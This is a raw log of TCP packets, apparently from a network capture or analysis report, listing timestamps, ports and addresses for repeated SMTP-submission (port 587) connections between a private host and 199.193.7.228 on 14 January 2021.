Jan 14, 2021 08:01:48.807338953 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:48.808012962 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:48.808676004 CET	49807	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:48.903970957 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:48.906389952 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:48.906964064 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:48.997342110 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:48.998759031 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:48.998785019 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.001667976 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.001777887 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.002258062 CET	49807	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.097399950 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.099673033 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.103323936 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.191651106 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.192244053 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.194171906 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.194680929 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.220356941 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.220902920 CET	49807	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.296591043 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.318809986 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.319329023 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.386054039 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.386106968 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.386537075 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.412264109 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.412755013 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.413347960 CET	49807	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.413479090 CET	49807	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.413573027 CET	49807	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.413676023 CET	49807	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.509623051 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.510199070 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.510804892 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.512408972 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.512466908 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.512624025 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.512773991 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.512917995 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.513058901 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.576463938 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.595582008 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.596913099 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.603456020 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.603486061 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.603498936 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.603691101 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.612200975 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.613069057 CET	49807	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.614697933 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.701108932 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.702011108 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.702677011 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.702732086 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.703011036 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.703056097 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.703167915 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.703207970 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.703222036 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.703257084 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.703330994 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.703362942 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.703619003 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.703809023 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.786916018 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.788330078 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.789113998 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.789246082 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.789375067 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.789520025 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.789639950 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.789736032 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.789835930 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.789926052 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.804244041 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.805145025 CET	587	49807	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.805237055 CET	49807	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.805473089 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.806318045 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.892479897 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.892867088 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.893198967 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.893304110 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.893373013 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.893546104 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.893591881 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.893610001 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.893873930 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.894057989 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.894150972 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.894236088 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:49.979034901 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.979141951 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.979218006 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.979378939 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.979547024 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.979581118 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.998202085 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:49.999521017 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.000015974 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.000456095 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.083702087 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.083740950 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.083766937 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.083822012 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.083919048 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.083981991 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.086994886 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.087023020 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.087038994 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.087064028 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.087124109 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.087256908 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.189568996 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.190327883 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.191077948 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.191111088 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.191211939 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.191900015 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.192112923 CET	49809	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.192306042 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.293973923 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.294055939 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.294085979 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.294120073 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.294143915 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.294167995 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.294203997 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.294291973 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.294367075 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.294734955 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.294915915 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.295063972 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.295205116 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.295358896 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.295500040 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.295635939 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.295800924 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.295945883 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.296086073 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.296248913 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.296256065 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.296300888 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.296334028 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.296498060 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.296650887 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.296770096 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.296905994 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.381876945 CET	587	49809	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.382050991 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.383850098 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.487039089 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487061024 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487070084 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487081051 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487096071 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487102985 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487114906 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487134933 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487142086 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487149000 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487163067 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487174988 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487180948 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487194061 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487200975 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487243891 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487251043 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487257004 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487267017 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487273932 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487281084 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487291098 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487483025 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.487694979 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.499296904 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.500233889 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.501522064 CET	49811	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.574196100 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.574331999 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.574363947 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.574449062 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.576585054 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.577541113 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.691679955 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.692079067 CET	587	49808	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.692600965 CET	49808	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.692996025 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.694696903 CET	49811	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.766336918 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.768101931 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.768327951 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.768357992 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.769071102 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.885778904 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.886068106 CET	49811	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:50.959224939 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.960202932 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:50.961113930 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.076356888 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.076761007 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.077038050 CET	49811	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.150939941 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.154906034 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.155730009 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.267127037 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.267568111 CET	49811	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.310873985 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.345902920 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.348212957 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.352721930 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.457662106 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.457803965 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.457818985 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.460397005 CET	49811	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.460913897 CET	49811	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.461639881 CET	49811	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.501318932 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.501744986 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.542633057 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.563905001 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.565145016 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.650871992 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.650892973 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.651500940 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.651892900 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.652426004 CET	49811	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.693038940 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.693440914 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.755126953 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.755736113 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.756341934 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.756524086 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.756711006 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.756891966 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.759187937 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.759339094 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.759511948 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.842447996 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.845248938 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.846249104 CET	49811	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.883444071 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.883703947 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.883953094 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.946301937 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.946333885 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.946458101 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.946579933 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.946681976 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.946800947 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.949095964 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.949126005 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.949189901 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.949227095 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.949233055 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.949304104 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:51.949333906 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.949404001 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:51.949995041 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.036283970 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.038743019 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.041651011 CET	49811	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.073928118 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.074518919 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.136543989 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.136593103 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.136719942 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.136764050 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.139147997 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.139204979 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.139305115 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.139338970 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.139523983 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.139839888 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.140033960 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.231725931 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.232597113 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.232971907 CET	49811	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.264484882 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.264673948 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.264731884 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.265376091 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.266513109 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.267210960 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.326812983 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.326834917 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.326981068 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.329202890 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.329431057 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.329504967 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.329570055 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.329605103 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.329828978 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.329863071 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.330115080 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.331984043 CET	49811	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.332088947 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.422974110 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.456118107 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.456348896 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.456382036 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.456429958 CET	49811	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.457149982 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.458204031 CET	587	49812	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.458971024 CET	49812	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.516979933 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.517020941 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.517046928 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.517096043 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.517160892 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.517177105 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.519465923 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.519495964 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.519545078 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.519723892 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.519867897 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.519886017 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.520050049 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.520313025 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.521415949 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.521891117 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.522032976 CET	587	49810	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.522332907 CET	49811	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.522427082 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.522769928 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.522784948 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.522792101 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.523276091 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.523318052 CET	587	49811	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:52.523413897 CET	49811	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.523435116 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.523492098 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.523787022 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.523813963 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.524125099 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.524149895 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.524458885 CET	49810	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:52.648884058 CET	587	49812	199.193.7.228	192.168.2.3
